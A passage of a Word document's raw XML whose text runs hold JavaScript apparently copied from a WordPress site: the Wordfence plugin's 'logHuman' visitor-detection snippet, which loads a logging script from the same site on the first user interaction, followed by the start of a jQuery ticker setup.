      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dblclick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> drag </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dragend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dragenter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dragleave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dragover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dragstart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> drop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>keydown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> keypress </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>keyup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mousedown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mousemove</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mouseout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mouseup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>scroll'.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(' ');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1093F5" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>logHuman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53092121" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>wfscr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>('script');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2048C409" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>wfscr.type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 'text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229546F7" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>wfscr.async</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D04653" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>wfscr.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> + '&amp;r=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Math.random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7826BAC3" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>document.getElementsByTagName(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D7B82A" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> i = 0; i &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evts.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0D755" w14:textId="77777777"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r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>removeEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[i], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>logHuman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7711BAEF" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D4D25" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C57B0E" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> i = 0; i &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evts.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E903F" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>addEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>evts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">[i], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>logHuman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0714A" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRPr="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C70AC3" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>})(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'//cupstv.com/?wordfence_logHuman=1&amp;hid=A33DC8CE28647EF51A7DF91A67DEA707');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4B461" w14:textId="77777777" w:rsidR="005B1BB0" w:rsidRDefault="005B1BB0" w:rsidP="005B1BB0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B8C966" w14:textId="77777777"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r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>jQuery(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1337EE" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>createTicker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55557230" w14:textId="77777777"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r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005B1BB0">
        <w:rPr>
          <w:color w:val="00B050"/>
